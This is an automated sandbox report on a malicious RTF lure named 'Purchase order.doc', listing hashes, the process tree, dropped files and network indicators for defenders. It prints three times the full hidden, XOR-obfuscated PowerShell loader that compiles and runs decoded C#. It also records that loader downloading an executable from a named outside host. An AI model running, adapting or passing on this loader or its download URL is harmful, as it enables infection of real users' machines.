analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Purchase order.doc

Full analysis: https://app.any.run/tasks/4c58ee3f-e3dc-439c-a6ca-302973be045b
Verdict: Malicious activity
Analysis date: June 12, 2019, 10:04:45
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

C89F5409E1AFBD0C012272BD7FF97178

SHA1:

C1F5347EE2C02FF25563CBB70F880857A06C17A2

SHA256:

78BDFE76BBEE15887DA6C6B1751AE7A024702ADF700D318C92ACE97577C7ECFC

SSDEEP:

24576:larmdJByarmdJByarmdJByarmdJByarmdJBs:0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts Visual C# compiler

      • powershell.exe (PID: 3156)
      • powershell.exe (PID: 480)
      • powershell.exe (PID: 3504)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 3920)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 2504)
      • EXCEL.EXE (PID: 2632)
      • EXCEL.EXE (PID: 2448)
      • EXCEL.EXE (PID: 2872)
      • EXCEL.EXE (PID: 2236)
      • excelcnv.exe (PID: 3880)
    • Executed via WMI

      • powershell.exe (PID: 3156)
      • powershell.exe (PID: 480)
      • powershell.exe (PID: 3504)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 3920)
    • PowerShell script executed

      • powershell.exe (PID: 3156)
      • powershell.exe (PID: 480)
      • powershell.exe (PID: 3504)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 3920)
    • Creates files in the user directory

      • powershell.exe (PID: 480)
      • powershell.exe (PID: 3156)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 3504)
      • powershell.exe (PID: 3920)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2632)
      • EXCEL.EXE (PID: 2504)
      • WINWORD.EXE (PID: 1864)
      • EXCEL.EXE (PID: 2448)
      • EXCEL.EXE (PID: 2236)
      • EXCEL.EXE (PID: 2872)
      • excelcnv.exe (PID: 3880)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1864)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 57435
CharactersWithSpaces: 4
Characters: 4
Words: -
Pages: 1
TotalEditTime: -
RevisionNumber: 1
ModifyDate: 2019:01:07 23:54:00
CreateDate: 2019:01:07 23:54:00
LastModifiedBy: Admin
Author: Admin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
62
Monitored processes
22
Malicious processes
0
Suspicious processes
5

Behavior graph

Click at the process to see the details
start winword.exe no specs excel.exe no specs powershell.exe excel.exe no specs powershell.exe no specs csc.exe excel.exe no specs cvtres.exe no specs powershell.exe no specs csc.exe excel.exe no specs cvtres.exe no specs powershell.exe no specs csc.exe excel.exe no specs cvtres.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs excelcnv.exe no specs csc.exe cvtres.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1864"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Purchase order.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2632"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3156powershell -WindowStyle Hidden function p6e9b39 { param($oe72f) $hddda = 'pd1dc76'; $scf2fe = ''; for ($i = 0; $i -lt $oe72f.length; $i+=2) { $h5a977 = [convert]::ToByte($oe72f.Substring($i, 2), 16); $scf2fe += [char]($h5a977 -bxor $hddda[($i / 2) % $hddda.length]); } return $scf2fe; } $ndda3b3 = '0517580a041765091745010e0c3b7a11420d0d5016231d4210065a1822115f100a5a535e2d5f1006455900375416155e5515170a69694245190a5644304e4504015c4a275e57170a5e17175e55035f3c6e16445f1e0311371a444215091f2d2c0c3b7a11420d0d5016231d4210065a183e01455f6e3d4605065d0d0017551c05421743475745520869694c3b7a44114443171650446a200f5b7f1d145e16171f141b01430a065b0542461d44265942021d610b0a59425059114624524220165e0722535202014217411e6b7d6e11444317165044111416555a19071117175642190711011b4353020a112d0d43660416111450060f4200192d0d4366041611065002501248111717455f1e03110a0551501452185f6e3d16504411444317162b205d082a5a461f16454c415c53020a54085005145c44740a17454f200b580a17170b50467d0b02537a19064305114e1459393c6e43171650441144434743120858074344421110580743524e0401430a437e580434451643445449505350021f450416580a0417464901065c4a0c3b7a44114443171650446a200f5b7f1d145e16171f141b01430a065b0542461d44265942021d610b0a594250591146355e440411500833455904015210411e6b7d6e11444317165044111416555a19071117175642190711011b4353020a11060c585a501009075a0e0f434c780a17674202445350510e035c44642d0d436604161101020f0211011d44165e58044454535406524348110b164316050d5f104359534550554d583a3c50441144431716503f75080f7e5b000b43104b157d15165f010f04045e005d08411b16350a45161a6759190a45445e171422105d290c41533d015c0b114e145c446201177b570310741611584450591102025b45154d6c69691716504411444317450405450d001753081054160d17401f0d5544150505430000014b7e5804344516434d0716505550021b16390a45341745161d5506575a54055c44580a17175b46025305061e0d7d6e3c6e431716504411444347431208580743444211105807435e580444495d0005551351194d6e3d16504411444317160b693b4443171650441144431716502d5f103343445012095551510f15440c4410550f440605054b4700155d53575a1f144155015d570506145055515002574107134d4a0c3b7a4411444317165044114443175f164419125b0604165d54445e0a16390a45341745182a01430b4a3a3c5044114443171650441144434c3b7a44114443171650441144431716504411030c4359500e0901565150465f3c6e4317165044114443171650444c69693a3c5044114443171650441144437e5804344516434e0349520050430a160057005d51531e065c0056050e535c444152060e54435d194650060649500354070406455004535252044650055451070345560550411e1f4b693b4443171650441144431716500d57444b4e0349520050430a0b502d5f103343445e3e54160c1e3b7a4411444317165044114443174d7d6e114443171650441144431716504411440458421f445b5c06025016520a6969171650441144431716504411196e3d3b7a44114443171650441144431763390a453417451606575000520f164d4419312a59422010434d560c3b7a44114443171650441144431743190a4544120f0347015050430a16405f3c6e4317165044114443171650445802431f17045c525d5a0e05581d045d5506025c444757025307484811541b03065c445e111717474851060102031f59693b4443171650441144431716501f3c6e43171650441144431716504411444317511f105e44090f5345025752583a3c5044114443171650441144434a3b7a441144431716504411444317740910543f3e175147500405430a160b44011c50061a50544902051b16401c0854434a0d7d6e114443171650441144431716390a4534174516170255515006164d447c0511445e11081f250f5b59132c76080c55571c4c024d583a3c5044114443171650441144437a57021759050f19751f14484c04000245051d44531b161702555150061a5057185f6e3d165044114443171650441144150505430000014b59530744780a176742024c48515a0107444a650b2a59424650194d431c16401c015452551f5c445602070205414811574a0c3b7a693b0e5b52031602075e6e3d3f796d660101745a19015f1043590e125c025307170b500a541343605312275d0d065942584d0a69693e3f791745160a595150075750500e164d44740a155e441f0a5c010d4318370145220c5b5215166105175f1e350a470d1158581d015f104d6446150758050f71591c0054164d76460008580702435f1f0a750517561f504f11463f6b5b4952080641171d501407015a5505494c1351060707445d0155411e0d7d6e386d6a590e125c02530719721f135f080c5652360d5d014b4700155d53575a1f14415c0054570207445108555b060f41010155570107475450515a060e41530052525205445652535b060e4151000756031459481107050305494d0a69693e3f7934430b0052450337450511437f1e025e44150552125d0257430a161e014644334559130142173043570210780a05581e130205575a1e0d7d6e386d6a67441f075417101965040543104b410414060857501e0d7d6e3c6e43171650441144431716504443011742441e44015f6e3d16504411444317160d693b6d6a47431208580743444211105807434442020d5f03434700155d53575a1f450416580a04175715550951540e1f7d6e11444317165044111f6e3d3f796d4210115e58174453575651545059114613530714070652410c3b7a441144431716504411444317450416580a041745125d05065756164d446210115e58174a740913434f4b693b444317165044114443171650025e16431f5f1e10110d430a16405f110d430b161101005c56000f5e28540a04435e4b445844480a16424d3c6e4317165044114443171650444a696917165044114443171650441144431716121d4501434705415d0300430a16330b5f120645425e305e261a4353580554555b0201494a6211014442020d5f034b5e1a50561848430600595f3c6e4317165044114443171650441144431745125d05065756165b59114c005f57024d191450060f4200113a4355054502533f4b5e165f44034d4312161257040201197a150a56100b6a1f4b693b444317165044114443171650193c6e6e3d16504411444317165044114411524205165f4410550f44060505583a3c5044114443171650193c6e1e'; $ndda3b32 = p6e9b39($ndda3b3); Add-Type -TypeDefinition $ndda3b32; [pa569]::x9c2cc5(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2504"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
480powershell -WindowStyle Hidden function p6e9b39 { param($oe72f) $hddda = 'pd1dc76'; $scf2fe = ''; for ($i = 0; $i -lt $oe72f.length; $i+=2) { $h5a977 = [convert]::ToByte($oe72f.Substring($i, 2), 16); $scf2fe += [char]($h5a977 -bxor $hddda[($i / 2) % $hddda.length]); } return $scf2fe; } $ndda3b3 = '0517580a041765091745010e0c3b7a11420d0d5016231d4210065a1822115f100a5a535e2d5f1006455900375416155e5515170a69694245190a5644304e4504015c4a275e57170a5e17175e55035f3c6e16445f1e0311371a444215091f2d2c0c3b7a11420d0d5016231d4210065a183e01455f6e3d4605065d0d0017551c05421743475745520869694c3b7a44114443171650446a200f5b7f1d145e16171f141b01430a065b0542461d44265942021d610b0a59425059114624524220165e0722535202014217411e6b7d6e11444317165044111416555a19071117175642190711011b4353020a112d0d43660416111450060f4200192d0d4366041611065002501248111717455f1e03110a0551501452185f6e3d16504411444317162b205d082a5a461f16454c415c53020a54085005145c44740a17454f200b580a17170b50467d0b02537a19064305114e1459393c6e43171650441144434743120858074344421110580743524e0401430a437e580434451643445449505350021f450416580a0417464901065c4a0c3b7a44114443171650446a200f5b7f1d145e16171f141b01430a065b0542461d44265942021d610b0a594250591146355e440411500833455904015210411e6b7d6e11444317165044111416555a19071117175642190711011b4353020a11060c585a501009075a0e0f434c780a17674202445350510e035c44642d0d436604161101020f0211011d44165e58044454535406524348110b164316050d5f104359534550554d583a3c50441144431716503f75080f7e5b000b43104b157d15165f010f04045e005d08411b16350a45161a6759190a45445e171422105d290c41533d015c0b114e145c446201177b570310741611584450591102025b45154d6c69691716504411444317450405450d001753081054160d17401f0d5544150505430000014b7e5804344516434d0716505550021b16390a45341745161d5506575a54055c44580a17175b46025305061e0d7d6e3c6e431716504411444347431208580743444211105807435e580444495d0005551351194d6e3d16504411444317160b693b4443171650441144431716502d5f103343445012095551510f15440c4410550f440605054b4700155d53575a1f144155015d570506145055515002574107134d4a0c3b7a4411444317165044114443175f164419125b0604165d54445e0a16390a45341745182a01430b4a3a3c5044114443171650441144434c3b7a44114443171650441144431716504411030c4359500e0901565150465f3c6e4317165044114443171650444c69693a3c5044114443171650441144437e5804344516434e0349520050430a160057005d51531e065c0056050e535c444152060e54435d194650060649500354070406455004535252044650055451070345560550411e1f4b693b4443171650441144431716500d57444b4e0349520050430a0b502d5f103343445e3e54160c1e3b7a4411444317165044114443174d7d6e114443171650441144431716504411440458421f445b5c06025016520a6969171650441144431716504411196e3d3b7a44114443171650441144431763390a453417451606575000520f164d4419312a59422010434d560c3b7a44114443171650441144431743190a4544120f0347015050430a16405f3c6e4317165044114443171650445802431f17045c525d5a0e05581d045d5506025c444757025307484811541b03065c445e111717474851060102031f59693b4443171650441144431716501f3c6e43171650441144431716504411444317511f105e44090f5345025752583a3c5044114443171650441144434a3b7a441144431716504411444317740910543f3e175147500405430a160b44011c50061a50544902051b16401c0854434a0d7d6e114443171650441144431716390a4534174516170255515006164d447c0511445e11081f250f5b59132c76080c55571c4c024d583a3c5044114443171650441144437a57021759050f19751f14484c04000245051d44531b161702555150061a5057185f6e3d165044114443171650441144150505430000014b59530744780a176742024c48515a0107444a650b2a59424650194d431c16401c015452551f5c445602070205414811574a0c3b7a693b0e5b52031602075e6e3d3f796d660101745a19015f1043590e125c025307170b500a541343605312275d0d065942584d0a69693e3f791745160a595150075750500e164d44740a155e441f0a5c010d4318370145220c5b5215166105175f1e350a470d1158581d015f104d6446150758050f71591c0054164d76460008580702435f1f0a750517561f504f11463f6b5b4952080641171d501407015a5505494c1351060707445d0155411e0d7d6e386d6a590e125c02530719721f135f080c5652360d5d014b4700155d53575a1f14415c0054570207445108555b060f41010155570107475450515a060e41530052525205445652535b060e4151000756031459481107050305494d0a69693e3f7934430b0052450337450511437f1e025e44150552125d0257430a161e014644334559130142173043570210780a05581e130205575a1e0d7d6e386d6a67441f075417101965040543104b410414060857501e0d7d6e3c6e43171650441144431716504443011742441e44015f6e3d16504411444317160d693b6d6a47431208580743444211105807434442020d5f03434700155d53575a1f450416580a04175715550951540e1f7d6e11444317165044111f6e3d3f796d4210115e58174453575651545059114613530714070652410c3b7a441144431716504411444317450416580a041745125d05065756164d446210115e58174a740913434f4b693b444317165044114443171650025e16431f5f1e10110d430a16405f110d430b161101005c56000f5e28540a04435e4b445844480a16424d3c6e4317165044114443171650444a696917165044114443171650441144431716121d4501434705415d0300430a16330b5f120645425e305e261a4353580554555b0201494a6211014442020d5f034b5e1a50561848430600595f3c6e4317165044114443171650441144431745125d05065756165b59114c005f57024d191450060f4200113a4355054502533f4b5e165f44034d4312161257040201197a150a56100b6a1f4b693b444317165044114443171650193c6e6e3d16504411444317165044114411524205165f4410550f44060505583a3c5044114443171650193c6e1e'; $ndda3b32 = p6e9b39($ndda3b3); Add-Type -TypeDefinition $ndda3b32; [pa569]::x9c2cc5(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2052"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\tzmrmxma.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
2448"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2180C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES5FE7.tmp" "c:\Users\admin\AppData\Local\Temp\CSC5FC7.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
3504powershell -WindowStyle Hidden function p6e9b39 { param($oe72f) $hddda = 'pd1dc76'; $scf2fe = ''; for ($i = 0; $i -lt $oe72f.length; $i+=2) { $h5a977 = [convert]::ToByte($oe72f.Substring($i, 2), 16); $scf2fe += [char]($h5a977 -bxor $hddda[($i / 2) % $hddda.length]); } return $scf2fe; } $ndda3b3 = '0517580a041765091745010e0c3b7a11420d0d5016231d4210065a1822115f100a5a535e2d5f1006455900375416155e5515170a69694245190a5644304e4504015c4a275e57170a5e17175e55035f3c6e16445f1e0311371a444215091f2d2c0c3b7a11420d0d5016231d4210065a183e01455f6e3d4605065d0d0017551c05421743475745520869694c3b7a44114443171650446a200f5b7f1d145e16171f141b01430a065b0542461d44265942021d610b0a59425059114624524220165e0722535202014217411e6b7d6e11444317165044111416555a19071117175642190711011b4353020a112d0d43660416111450060f4200192d0d4366041611065002501248111717455f1e03110a0551501452185f6e3d16504411444317162b205d082a5a461f16454c415c53020a54085005145c44740a17454f200b580a17170b50467d0b02537a19064305114e1459393c6e43171650441144434743120858074344421110580743524e0401430a437e580434451643445449505350021f450416580a0417464901065c4a0c3b7a44114443171650446a200f5b7f1d145e16171f141b01430a065b0542461d44265942021d610b0a594250591146355e440411500833455904015210411e6b7d6e11444317165044111416555a19071117175642190711011b4353020a11060c585a501009075a0e0f434c780a17674202445350510e035c44642d0d436604161101020f0211011d44165e58044454535406524348110b164316050d5f104359534550554d583a3c50441144431716503f75080f7e5b000b43104b157d15165f010f04045e005d08411b16350a45161a6759190a45445e171422105d290c41533d015c0b114e145c446201177b570310741611584450591102025b45154d6c69691716504411444317450405450d001753081054160d17401f0d5544150505430000014b7e5804344516434d0716505550021b16390a45341745161d5506575a54055c44580a17175b46025305061e0d7d6e3c6e431716504411444347431208580743444211105807435e580444495d0005551351194d6e3d16504411444317160b693b4443171650441144431716502d5f103343445012095551510f15440c4410550f440605054b4700155d53575a1f144155015d570506145055515002574107134d4a0c3b7a4411444317165044114443175f164419125b0604165d54445e0a16390a45341745182a01430b4a3a3c5044114443171650441144434c3b7a44114443171650441144431716504411030c4359500e0901565150465f3c6e4317165044114443171650444c69693a3c5044114443171650441144437e5804344516434e0349520050430a160057005d51531e065c0056050e535c444152060e54435d194650060649500354070406455004535252044650055451070345560550411e1f4b693b4443171650441144431716500d57444b4e0349520050430a0b502d5f103343445e3e54160c1e3b7a4411444317165044114443174d7d6e114443171650441144431716504411440458421f445b5c06025016520a6969171650441144431716504411196e3d3b7a44114443171650441144431763390a453417451606575000520f164d4419312a59422010434d560c3b7a44114443171650441144431743190a4544120f0347015050430a16405f3c6e4317165044114443171650445802431f17045c525d5a0e05581d045d5506025c444757025307484811541b03065c445e111717474851060102031f59693b4443171650441144431716501f3c6e43171650441144431716504411444317511f105e44090f5345025752583a3c5044114443171650441144434a3b7a441144431716504411444317740910543f3e175147500405430a160b44011c50061a50544902051b16401c0854434a0d7d6e114443171650441144431716390a4534174516170255515006164d447c0511445e11081f250f5b59132c76080c55571c4c024d583a3c5044114443171650441144437a57021759050f19751f14484c04000245051d44531b161702555150061a5057185f6e3d165044114443171650441144150505430000014b59530744780a176742024c48515a0107444a650b2a59424650194d431c16401c015452551f5c445602070205414811574a0c3b7a693b0e5b52031602075e6e3d3f796d660101745a19015f1043590e125c025307170b500a541343605312275d0d065942584d0a69693e3f791745160a595150075750500e164d44740a155e441f0a5c010d4318370145220c5b5215166105175f1e350a470d1158581d015f104d6446150758050f71591c0054164d76460008580702435f1f0a750517561f504f11463f6b5b4952080641171d501407015a5505494c1351060707445d0155411e0d7d6e386d6a590e125c02530719721f135f080c5652360d5d014b4700155d53575a1f14415c0054570207445108555b060f41010155570107475450515a060e41530052525205445652535b060e4151000756031459481107050305494d0a69693e3f7934430b0052450337450511437f1e025e44150552125d0257430a161e014644334559130142173043570210780a05581e130205575a1e0d7d6e386d6a67441f075417101965040543104b410414060857501e0d7d6e3c6e43171650441144431716504443011742441e44015f6e3d16504411444317160d693b6d6a47431208580743444211105807434442020d5f03434700155d53575a1f450416580a04175715550951540e1f7d6e11444317165044111f6e3d3f796d4210115e58174453575651545059114613530714070652410c3b7a441144431716504411444317450416580a041745125d05065756164d446210115e58174a740913434f4b693b444317165044114443171650025e16431f5f1e10110d430a16405f110d430b161101005c56000f5e28540a04435e4b445844480a16424d3c6e4317165044114443171650444a696917165044114443171650441144431716121d4501434705415d0300430a16330b5f120645425e305e261a4353580554555b0201494a6211014442020d5f034b5e1a50561848430600595f3c6e4317165044114443171650441144431745125d05065756165b59114c005f57024d191450060f4200113a4355054502533f4b5e165f44034d4312161257040201197a150a56100b6a1f4b693b444317165044114443171650193c6e6e3d16504411444317165044114411524205165f4410550f44060505583a3c5044114443171650193c6e1e'; $ndda3b32 = p6e9b39($ndda3b3); Add-Type -TypeDefinition $ndda3b32; [pa569]::x9c2cc5(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
772"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\1xmgxlhx.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Total events
3 334
Read events
2 607
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
10
Text files
13
Unknown types
7

Dropped files

PID
Process
Filename
Type
1864WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR477C.tmp.cvr
MD5:
SHA256:
2632EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR5334.tmp.cvr
MD5:
SHA256:
2504EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR5AA6.tmp.cvr
MD5:
SHA256:
3156powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NV388RSKXC6FO0GVVJ8S.temp
MD5:
SHA256:
2448EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR5F4A.tmp.cvr
MD5:
SHA256:
2052csc.exeC:\Users\admin\AppData\Local\Temp\CSC5FC7.tmp
MD5:
SHA256:
2052csc.exeC:\Users\admin\AppData\Local\Temp\tzmrmxma.pdb
MD5:
SHA256:
2180cvtres.exeC:\Users\admin\AppData\Local\Temp\RES5FE7.tmp
MD5:
SHA256:
480powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S0H8SCM0XYYBL68BR4ZE.temp
MD5:
SHA256:
2052csc.exeC:\Users\admin\AppData\Local\Temp\tzmrmxma.dll
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3156
powershell.exe
GET
503
185.138.42.46:80
http://newsin.gr/POO.exe
GR
html
1.58 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3156
powershell.exe
185.138.42.46:80
newsin.gr
Fragkoulis Maounis & Co. General Partnership (OE)
GR
malicious

DNS requests

Domain
IP
Reputation
newsin.gr
  • 185.138.42.46
malicious

Threats

PID
Process
Class
Message
3156
powershell.exe
Web Application Attack
ET WEB_CLIENT Possible HTTP 503 XSS Attempt (External Source)
3156
powershell.exe
Web Application Attack
ET WEB_CLIENT Possible HTTP 503 XSS Attempt (External Source)
3156
powershell.exe
Web Application Attack
ET WEB_CLIENT Possible HTTP 503 XSS Attempt (External Source)
3156
powershell.exe
Web Application Attack
ET WEB_CLIENT Possible HTTP 503 XSS Attempt (External Source)
3156
powershell.exe
Web Application Attack
ET WEB_CLIENT Possible HTTP 503 XSS Attempt (External Source)
3156
powershell.exe
Web Application Attack
ET WEB_CLIENT Possible HTTP 503 XSS Attempt (External Source)
3156
powershell.exe
Web Application Attack
ET WEB_CLIENT Possible HTTP 503 XSS Attempt (External Source)
3156
powershell.exe
Web Application Attack
ET WEB_CLIENT Possible HTTP 503 XSS Attempt (External Source)
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144